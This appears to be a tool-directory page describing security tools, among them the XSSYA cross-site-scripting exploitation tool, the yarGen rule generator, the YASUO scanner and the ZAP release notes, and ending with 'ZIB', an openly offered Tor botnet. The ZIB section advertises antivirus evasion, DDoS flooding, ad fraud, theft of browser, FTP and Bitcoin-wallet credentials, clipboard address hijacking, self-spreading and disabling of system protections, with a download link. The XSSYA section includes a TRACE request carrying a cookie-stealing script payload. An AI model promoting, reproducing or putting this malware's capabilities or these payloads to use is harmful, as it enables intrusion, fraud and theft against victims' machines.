    XSSYA v2.0 has more payloads; the library contains 41 payloads to enhance the detection level.
    The XSS scanner has been removed from XSSYA to reduce false positives.
    URLs to be tested previously could not end in any character except (/ - = - ?), but this limitation has now been removed.

    What’s new in XSSYA V2.0?
    Custom Payload 1 – You have the ability to choose your own custom payload Ex: and you can encode your custom payload with different types of encodings such as (B64 – HEX – URL_Encode – HEX with semicolons)
    (HTML Entities → Single & Double Quote only - brackets – And – or encode the whole payload with HTML Entities). This feature also supports the XSS vulnerability confirmation method: you choose your custom payload and custom encoding, execute it, and if the response is 200 the tool checks for the same payload decoded in the HTML code of the page.

    HTML5 Payloads: XSSYA v2.0 contains a library of 44 HTML5 payloads

    XSSYA has a library of the applications most frequently vulnerable to XSS (Cross Site Scripting); this library covers (Apache – WordPress – phpMyAdmin). If you choose Apache, it gives the CVE number, the affected Apache version and a link to the CVE for more details, so it is easy to find which versions are affected by XSS.

    XSSYA has the feature to convert the IP address of the attacker to (Hex, Dword, Octal) to bypass any security mechanism or IPS that may exist on the target domain.

    XSSYA checks whether the target is vulnerable to XST (Cross Site Tracing): it sends a custom TRACE request and checks whether the target domain is vulnerable. The request looks like this:
    TRACE / HTTP/1.0
    Host: demo.testfire.net
    Header1: < script >alert(document.cookie);

    XSSYA Features
    * Support HTTPS
    * After Confirmation (execute payload to get cookies)
    * Can be run in (Windows - Linux)
    * Identify 3 types of WAF (Mod_Security - WebKnight - F5 BIG IP)
    * XSSYA contains a library of encoded payloads to bypass WAFs (Web Application Firewalls)
    * Support saving the web HTML code before executing the payload
    * Viewing the web HTML code on the screen or terminal

    More details
    http://labs.dts-solution.com/xssya-forget-the-browser-for-xss-by-yehia-mamdouh/


    Download XSSYA v2.0

    yarGen - A Generator for Yara Rules (for malware researchers)


    yarGen is a generator for Yara rules.

    What does yarGen do?

    The main principle is the creation of yara rules from strings found in malware files while removing all strings that also appear in goodware files.

    Since version 0.14.0 it uses naive-bayes-classifier by Mustafa Atik and Nejdet Yucesoy in order to classify the string and detect useful words instead of compression/encryption garbage.

    Since version 0.12.0 yarGen does not completely remove the goodware strings from the analysis process but includes them with a very low score. Such strings are only used in a rule if no better strings can be found, and the rule is then marked with the comment /* Goodware rule */. Force yarGen to remove all goodware strings with --excludegood. Also since version 0.12.0, yarGen allows you to place the "strings.xml" from PEstudio in the program directory in order to apply its blacklist definition during the string analysis process. You'll get better results.

    The rule generation process tries to identify similarities between the files that get analyzed and then combines the strings into so-called "super rules". Up to now the super rule generation does not remove the simple rule for the files that have been combined in a single super rule. This means that there is some redundancy when super rules are created. You can suppress a simple rule for a file that was already covered by a super rule by using --nosimple.

    Installation
    1. Make sure you have at least 2GB of RAM on the machine on which you plan to use yarGen
    2. Clone the git repository
    3. Install all dependencies with sudo pip install pickle scandir lxml naiveBayesClassifier
    4. Unzip the goodware database (e.g. 7z x good-strings.db.zip.001)
    5. See the help with python yarGen.py --help

    Memory Requirements

    Warning: yarGen pulls the whole goodstring database to memory and uses up to 2 GB of memory for a few seconds.

    Command Line Parameters

    usage: yarGen.py [-h] [-m M] [-g G] [-u] [-c] [-o output_rule_file]
                     [-p prefix] [-a author] [-r ref] [-l min-size] [-z min-score]
                     [-s max-size] [-rc maxstrings] [-nr] [-oe] [-fs size-in-MB]
                     [--score] [--inverse] [--nodirname] [--noscorefilter]
                     [--excludegood] [--nosimple] [--nomagic] [--nofilesize]
                     [-fm FM] [--noglobal] [--nosuper] [--debug]
    
    yarGen
    
    optional arguments:
      -h, --help           show this help message and exit
      -m M                 Path to scan for malware
      -g G                 Path to scan for goodware (dont use the database
                           shipped with yaraGen)
      -u                   Update local goodware database (use with -g)
      -c                   Create new local goodware database (use with -g)
      -o output_rule_file  Output rule file
      -p prefix            Prefix for the rule description
      -a author            Author Name
      -r ref               Reference
      -l min-size          Minimum string length to consider (default=8)
      -z min-score         Minimum score to consider (default=5)
      -s max-size          Maximum length to consider (default=128)
      -rc maxstrings       Maximum number of strings per rule (default=20,
                           intelligent filtering will be applied)
      -nr                  Do not recursively scan directories
      -oe                  Only scan executable extensions EXE, DLL, ASP, JSP,
                           PHP, BIN, INFECTED
      -fs size-in-MB       Max file size in MB to analyze (default=3)
      --score              Show the string scores as comments in the rules
      --inverse            Show the string scores as comments in the rules
      --nodirname          Don't use the folder name variable in inverse rules
      --noscorefilter      Don't filter strings based on score (default in
                           'inverse' mode)
      --excludegood        Force the exclude all goodware strings
      --nosimple           Skip simple rule creation for files included in super
                           rules
      --nomagic            Don't include the magic header condition statement
      --nofilesize         Don't include the filesize condition statement
      -fm FM               Multiplier for the maximum 'filesize' condition
                           (default: 5)
      --noglobal           Don't create global rules
      --nosuper            Don't try to create super rules that match against
                           various files
      --debug              Debug output
    

    Best Practice

    See the following blog post for a more detailed description on how to use yarGen for YARA rule creation: How to Write Simple but Sound Yara Rules

    Examples

    Use the shipped database (FAST) to create some rules
    python yarGen.py -m X:\MAL\Case1401

    Use the shipped database of goodware strings and scan the malware directory "X:\MAL" recursively. Create rules for all files included in this directory and below. A file named 'yargen_rules.yar' will be generated in the current directory.

    Show the score of the strings as comment

    yarGen will by default use the top 20 strings based on their score. To see how a certain string in the rule scored, use the "--score" parameter.
    python yarGen.py --score -m X:\MAL\Case1401

    Use only strings with a certain minimum score

    In order to use only strings for your rules that match a certain minimum score, use the "-z" parameter. It is good practice to first create rules with "--score" and then perform a second run with a minimum score set for your sample set via "-z".
    python yarGen.py --score -z 5 -m X:\MAL\Case1401

    Preset author and reference
    python yarGen.py -a "Florian Roth" -r "http://goo.gl/c2qgFx" -m /opt/mal/case_441 -o case441.yar

    Exclude strings from Goodware samples
    python yarGen.py --excludegood -m /opt/mal/case_441

    Suppress simple rules if already covered by a super rule
    python yarGen.py --nosimple -m /opt/mal/case_441

    Show debugging output
    python yarGen.py --debug -m /opt/mal/case_441

    Create a new goodware strings database
    python yarGen.py -c -g C:\Windows\System32

    Update the goodware strings database (append new strings to the old ones)
    python yarGen.py -u -g "C:\Program Files"

    Inverse rule creation (still beta)

    In order to create some inverse rules on goodware, you have to prepare a directory with subdirectories in which you include all versions of the files you want to create inverse rules for with their original name and in their original folder. If that sounds strange, let me give you an example.
    E.g. if you want to create inverse rules for all Windows executables in the System32 folder, you have to create a goodware archive with the following directory structure:
    • G:\goodware
      • WindowsXP
        • System32 - all files
      • Windows2003
        • System32 - all files
      • Windows2008R2
        • System32 - all files
    yarGen then creates rules that identify e.g. the file name "cmd.exe" in a path ending with "System32" and check whether the file contains certain necessary strings. If the strings don't show up, the rule will fire. This indicates a replaced system file or a malware file that tries to masquerade as a system file.
    python yarGen.py --inverse -oe -m G:\goodware\

    You can also instruct yarGen not to include the file path but solely rely on the filename.
    python yarGen.py --inverse -oe --nodirname -m G:\goodware\


    Download yarGen

    YASUO - Scans for Vulnerable & Exploitable 3rd-party Web Applications


    Yasuo is a ruby script that scans for vulnerable 3rd-party web applications.

    While working on a network security assessment (internal, external, redteam gigs etc.), we often come across vulnerable 3rd-party web applications or web front-ends that allow us to compromise the remote server by exploiting publicly known vulnerabilities. Some of the common & favorite applications are Apache Tomcat administrative interface, JBoss jmx-console, Hudson Jenkins and so on.

    If you search through Exploit-db, there are over 10,000 remotely exploitable vulnerabilities that exist in tons of web applications/front-ends and could allow an attacker to completely compromise the back-end server. These vulnerabilities range from RCE to malicious file uploads to SQL injection to RFI/LFI etc.

    Yasuo is built to quickly scan the network for such vulnerable applications thus serving pwnable targets on a silver platter.

    Setup / Install

    You would need to install the following gems:
    gem install ruby-nmap net-http-persistent mechanize colorize text-table

    Details

    Yasuo provides following command-line options:
    -r :: If you want Yasuo to perform port scan, use this switch to provide an IP address or IP range or an input file with new-line separated IP addresses
    -s :: Provide custom signature file. [./yasuo.rb -s mysignatures.yaml -f nmap.xml] [Default - signatures.yaml]
    -f :: If you do not want Yasuo to perform port scan and already have an nmap output in xml format, use this switch to feed the nmap output
    -n :: Tells Yasuo to not ping the host while performing the port scan. Standard nmap option.
    -p :: Use this switch to provide port number(s)/range
    -A :: Use this switch to scan all the 65535 ports. Standard nmap option.
    -b [all/form/basic] :: If the discovered application implements authentication, use this switch to brute-force the auth. "all" will brute-force both form & http basic auth. "form" will only brute-force form-based auth. "basic" will only brute-force http basic auth.
    -t :: Specify maximum number of threads
    -h :: Well, take a guess

    Examples

    ./yasuo -r 127.0.0.1 -p 80,8080,443,8443 -b form
    The above command will perform port scan against 127.0.0.1 on ports 80, 8080, 443 and 8443 and will brute-force login for all the applications that implement form-based authentication.
    ./yasuo -f my_nmap_output.xml -b all
    The above command will parse the nmap output file "my_nmap_output.xml" and will brute-force login for all the applications that implement form-based and http basic authentication.


    Download YASUO

    YaVol - GUI for Volatility Framework and Yara


    This is just another GUI for Volatility and Yara which could make someone's life easier. It is intended for incident responders for quick examination of a memory image. Results are stored in an sqlite db for reuse.

    1. Installation

    Clone repo
    • git clone https://Ft44k@bitbucket.org/Ft44k/yavol.git
    • the default folder for yara sigs is /yara_rules

    2. Prerequisites

    You need to have Python (2.7), PyQt4 and sqlite3 installed.


    Download YaVol

    ZAP 2.4.2 - Penetration Testing Tool for Testing Web Applications


    The Zed Attack Proxy (ZAP) is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications.

    It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing.

    ZAP provides automated scanners as well as a set of tools that allow you to find security vulnerabilities manually.

    Release 2.4.2

    The following changes were made in this release:

    Enhancements:
    • Issue 1306 : Java PermSize command line flag removed in Java 8
    • Issue 1593 : Auto-scroll in Spider tab
    • Issue 1600 : Dont report X-Frame-Options alert on 403 and 404 pages
    • Issue 1654 : httpSessions/createEmptySession should initialize a site that was not previously visited
    • Issue 1702 : Add "recurse" option to the spider API
    • Issue 1715 : Unable to pass arguments when launching ZAP from the command line on Mac OS X
    • Issue 1766 : Remove context via the API
    • Issue 1768 : Update to use a more recent user-agent
    • Issue 1778 : Passive scan AJAX spider requests
    • Issue 1790 : Move Buffer Overflow Scanner from Beta to Release
    • Issue 1793 : Allow active scan scripts to check if the scan was stopped
    • Issue 1795 : Allow JVM options to be configured via GUI
    • Issue 1799 : Minor Feature Request: Allow URL to be pasted into start Spider dialog.
    • Issue 1802 : Minor Enhancement: Change active Pause Button to a Play button
    • Issue 1849 : Option to merge related issues in reports
    • Issue 1857 : Libraries that were updated
    • Issue 1865 : Increase maximum db size

    Bug fixes:
    • Issue 1760 : Unable to initialize home directory! xml/config.xml (No such file or directory)
    • Issue 1763 : Automatic check for updates fails to report new versions
    • Issue 1770 : Exceptions when calling (some) context API actions in daemon mode
    • Issue 1771 : For OSX the zap.sh in the core download hard-codes the relative java location
    • Issue 1772 : On OS X, Found Java version lies
    • Issue 1777 : "Cannot locate configuration source null.policy" after opening "Active Scan" dialogue
    • Issue 1781 : ZAP errors with "Unsupported option '-psn_x_xxxxxxx'" on OS X
    • Issue 1784 : NullPointerException when active scanning through the API with a target without scheme
    • Issue 1785 : Plugin enabled even if dependencies are not, "hangs" active scan
    • Issue 1787 : Context not used by the Spider even if selected
    • Issue 1788 : Scan Progress Pane Needs Sorting Change
    • Issue 1789 : Forced Browse/AJAX Spider messages not restored to Sites tab
    • Issue 1792 : Report not generated in daemon mode
    • Issue 1798 : Stop Attack Feature Locks up ZAP?
    • Issue 1804 : Disable processing of XML external entities by default
    • Issue 1805 : ZAP API might not return the response in requested format on errors
    • Issue 1858 : Spider might report wrong progress after finishing
    • Issue 1872 : EDT accessed in daemon mode

    Zer0 - Secured file deletion made easy


    Zer0 is a user friendly file deletion tool with a high level of security.

    With Zer0, you'll be able to delete files and to prevent their recovery by a third party. So far, no user has reported an efficient method to recover a file deleted by Zer0.

    Features
    • User friendly HMI: drag'n'drop, 1 click and the job is done!
    • High security file deletion algorithm
    • Multithreaded application core : Maximum efficiency without freezing the application.
    • Internationalization support.

    ZeroNet - Decentralized websites using Bitcoin crypto and BitTorrent network


    Decentralized websites using Bitcoin crypto and the BitTorrent network - http://zeronet.io

    Why?
    • We believe in an open, free, and uncensored network and communication.
    • No single point of failure: a site remains online so long as at least 1 peer is serving it.
    • No hosting costs: Sites are served by visitors.
    • Impossible to shut down: It's nowhere because it's everywhere.
    • Fast and works offline: You can access the site even if your internet is unavailable.

    Features
    • Real-time updated sites
    • Namecoin .bit domains support
    • Easy to setup: unpack & run
    • Clone websites in one click
    • Password-less BIP32 based authorization: your account is protected by the same cryptography as your Bitcoin wallet
    • Built-in SQL server with P2P data synchronization: Allows easier site development and faster page load times
    • Tor network support
    • TLS encrypted connections
    • Automatic uPnP port opening
    • Plugin for multiuser (openproxy) support
    • Works with any browser/OS

    How does it work?
    • After starting zeronet.py you will be able to visit zeronet sites using http://127.0.0.1:43110/{zeronet_address} (eg. http://127.0.0.1:43110/1EU1tbG9oC1A8jz2ouVwGZyQ5asrNsE4Vr).
    • When you visit a new zeronet site, it tries to find peers using the BitTorrent network so it can download the site files (html, css, js...) from them.
    • Each site you visit is also served by you.
    • Every site contains a site.json which holds the sha512 hash of every other file and a signature generated using the site's private key.
    • If the site owner (who has the private key for the site address) modifies the site, then he/she signs the new content.json and publishes it to the peers. After the peers have verified the content.json integrity (using the signature), they download the modified files and publish the new content to other peers.

    How to join?

    Windows
    It downloads the latest version of ZeroNet then starts it automatically.

    Alternative method for Windows by installing Python

    Linux

    Debian
    • sudo apt-get update
    • sudo apt-get install msgpack-python python-gevent
    • wget https://github.com/HelloZeroNet/ZeroNet/archive/master.tar.gz
    • tar xvpfz master.tar.gz
    • cd ZeroNet-master
    • Start with python zeronet.py
    • Open http://127.0.0.1:43110/ in your browser and enjoy! :)

    Other Linux or without root access
    • Check your python version using python --version; if the returned version is not Python 2.7.X, then try the python2 or python2.7 command and use it from now on
    • wget https://bootstrap.pypa.io/get-pip.py
    • python get-pip.py --user gevent msgpack-python
    • Start with python zeronet.py

    Mac
    • Install Homebrew
    • brew install python
    • pip install gevent msgpack-python
    • Download, Unpack, run python zeronet.py

    Vagrant
    • vagrant up
    • Access VM with vagrant ssh
    • cd /vagrant
    • Run python zeronet.py --ui_ip 0.0.0.0
    • Open http://127.0.0.1:43110/ in your browser

    Docker


    Download ZeroNet

    ZIB - The Open Tor Botnet


    General information and instructions.

    The Open Tor Botnet requires the installation and configuration of bitcoind, however I neglect to detail this here out of a lack of time.
    This bot-net is fully undetectable and bypasses all antivirus through running on top of Python27's pyinstaller, which is used for many non-Trojan computer programs. The only hypothetical possibility of detection comes from the script, however, the script contains randomized-looking data through using a randomized AES key and initialization vector, meaning this is a non-issue.

    ZIB.py is the main project file.
    intel.py is the chat bot for handling automatic transactions and client authentication.
    compileZIB.py is used by intel.py, and is started in the background using chp.exe
    ZIB_imports.txt contains all the Python module imports that ZIB uses. They're appended to the script during compilation.
    btcpurchases.txt includes all the Bitcoin payments that are pending. Pending transactions older than 24 hours are deleted.
    channels.txt includes all completed BTC payments.
    Point your webserver to C:\Python27\dist\ for hosting the bot executables.
    chp.exe is required in the local dir.
    For the IRC server, run bircd, set up an oper with the username Zlo and password RUSSIA!@#$RUSSIA!@#$RUSSIA!@#$RUSSIA!@#$. For the max users per ip set to 0 because tor users all connect from 127.0.0.1 and look the same to the IRCd. Keep all scripts in C:\Python27\Scripts.
    Put nircmd in the local directory for editing file dates.

    Features

    • ZIB is an IRC-based, Bitcoin-funded bot network that runs under Tor for anonymity.
    • ZIB is coded totally from scratch.
    • ZIB uses the Department of Defense standard for encryption of Top Secret files as one of the methods of generating fully undetectable binaries every time!
    • ZIB creates a new binary for every client with varying file sizes, creation dates, and rot13->zlib->base64->AES-256(random key+IV) encrypted strings.
    • ZIB is fully undetectable (FUD) to Anti-Virus.
    • ZIB has an automated system for handling payments, providing bot-net binaries, and creating bot-net IRC channels.
    • All bot networks on a ZIB network require a password to join.
    • ZIB uses passworded user-based authentication, handled through our Zlo intelligence bot, so you don't have to worry about channel password, main password, or bot compromise. Normal users can't create their own channels. All IRC functionalities are handled by the Zlo IRC intelligence bot. You can do authenticated, single bot commands through Zlo, or set up a user session on your bots, which is slightly less secure.
    • Paid users get unlimited bot space per channel.
    • Our bot has been tested on and is fully compatible with Windows Server 2008 R2 32-bit, Windows XP SP1 & SP3 32-bit, Windows 7, and Windows 8 64-bit.


    Features

    • Multi-threaded HTTP/s (layer7 [Methods: TorsHammer, PostIt, Hulk, ApacheKiller, Slowloris, GoldenEye]), TCP/SSL, and fine-tuned UDP flooding. Ability to flood hidden services, or attack via the clearnet. 66 randomized DDoS user-agents and referers. All methods send randomized data, bypass firewalls, filtering, and caching. ZIB also comes with FTP flood, and TeamSpeak flood.
    • Undetectable ad-fraud smart viewer that's fully compatible with Firefox, Tor Browser Bundle, Portable Firefox, Internet Explorer, Google Chrome, Opera, Yandex, Torch, FlashPeak SlimBrowser, Epic Privacy Browser, Baidu, Maxthon, Comodo IceDragon, and QupZilla.
    • Download & Execute w/ optional SHA256 verification.
    • Update w/ optional SHA256 verification.
    • Chrome password recovery.
    • Each bot can act as a shell booter and utilize external php shells for attacks.
    • Replace Bitcoin addresses in clipboard with yours.
    • FileZilla password recovery.
    • Fully routed through Tor.
    • File, registry, startup folder, and main/daemon/tor process persistence.
    • Installation and use is completely hidden from bots.
    • 0/60 Fully undetectable to Antivirus.
    • File download/upload.
    • Process status, creator, and killer.
    • Undetectable, instant obfuscation when generating new binaries.
    • Self spreading.
    • All bot files are SHA256 hash verified. Broken/corrupted files get replaced.
    • Bypasses AntiVirus Deep-Scan.
    • Bot location varies, depending on administrative access.
    • IRC nickname format: Country[version]windows version|CPU bits|User Privileges|CPU cores|random characters. Ex: US[v2]XP|x32|A|4c|F4L0s4kpN5. 64-bit detection may be having issues (shows up as 32-bit).
    • Disables various windows functions WITHOUT giving the user warnings!
    • Disables Microsoft Windows error reporting, sending additional data, and error logging - System-wide as administrator, and on a per-user basis.
    • Disables User Access Control (UAC) - System-wide as administrator, and on a per-user basis.
    • Disables Windows Volume Shadow Copy Backup Service (vss) - System-wide as administrator.
    • Disables System Restore Service (srservice) - System-Wide as administrator.
    • Disables System Restore - System-Wide as administrator.
    • Melts on execution. Original file gets deleted. Should delete the file out of the temporary folder, if used with a binder.
    • Multi-threaded mass SSH scanner that saves servers on the bot's HDD, encoded with base64, without duplicates or honeypots. Four integrated password lists of increasing difficulty [A,B,C,D], or brute force with min/max characters (supports numbers, upper/lowercase letters, symbols). Cracked routers are used for UDP/TCP/HTTP/ICMP flooding. UDP flood requires having the routers download a Python script, and the majority of routers won't have Python. Has the ability to be used to take down DDoS-protected servers from scanning with just one bot. The Open Tor Botnet optionally will scan under Tor, multiple ports at once, IP range(s) [A/B/C] or randomized IPs, optionally block government IPs, and blocks reserved IPv4 addresses aside from the user's LAN. BotKiller with file scanning [kills .exe, .bat, .scr, .pif, .dll, .lnk, .com] in AppData, Startup, etc. and has been successful against NanoCore, Andromeda, AGhost Silent Miner, Plasma HTTP/IRC/RAT, and almost every HackForums bot. The botkiller utilizes process scanning with file deletion, and registry scanning.
    • Mutex. No duplicate IRC connections.
    • Amazing error handling, install rate, detection ratio, and persistence.
    • Completely native malware. No .NET framework, or Python installation required!
    • Installs to the startup folder & AppData with a registry RUN key.
    • Kills all popular anti-virus and prevents A/V installation. Will disable Anti-Virus which have rootkits, through deleting important A/V dlls.
    • BotKiller, scanner, and A/V killer are optional. You could easily run the Open Tor botnet as a back-up for your bots, or install other software on them as back-up. The network control system is highly scalable. Dual-process and dual-file persistence. Files and processes are re-created nearly instantly after being removed.
    • Recovers File-Zilla logins, which is great for getting SSH, and FTP logins.
    • Automatically removes some ad-ware.
    • Contains an Omegle spreader which spreads either a link through social engineering tactics, or a Skype account with every line of text being completely unique in order to avoid detection. Always waits for the Omegle stranger to type a message before responding with a reply. Shows stranger typing, and writes messages human-like. Multi-threaded.
    • Deletes zone identifier on all bot files, Tor, download & executed files, and update files. This means that you don't get the "Would you like to run this program?" dialog, and it runs completely hidden.
    • Detects all Windows operating systems from Windows 95, ME, to 8. Will show Windows 10 as just Windows, or W8. Text-To-Speech with speaker detection.
    • Duplicate nick-name handling, and ping-out handling.
    • Tor is downloaded directly from the Tor Project - It only needs to be downloaded once, but still has persistence.
    • Grabs the bot IP address on startup, has the ability to disable/enable bot command response, view status of ssh scanner/omegle spreading/ddos/botkiller and start/stop them.
    • Functionality to kill the bot instance, uninstall ZIB, grab full OS info, check if a host on a certain port is online/offline using TCP connect and a full HTTP request whilst checking the reply for server status related information.
    • Check if a process is running, how many are running, and list directories. Use \ instead of C:\, e.g. !dir \, as some people run their main operating system on non-standard drive letters, especially on servers.
    • Upload specific files of your choosing that exist on a bot's computer to your FTP server. Files that can be uploaded could include BTC wallets.
    • Read files in plain-text off zombie computers. View amount of scanned SSH servers. Kill processes. The bot will tell you about missing command parameters, if a certain parameter contains the wrong data-type, etc. Errors from executing a command are outputted to the IRC channel without flooding the chat.
    • Commands are run multi-threaded and concurrently. This means your bots won't freeze up each time you run a command.


    Download Zib-Trojan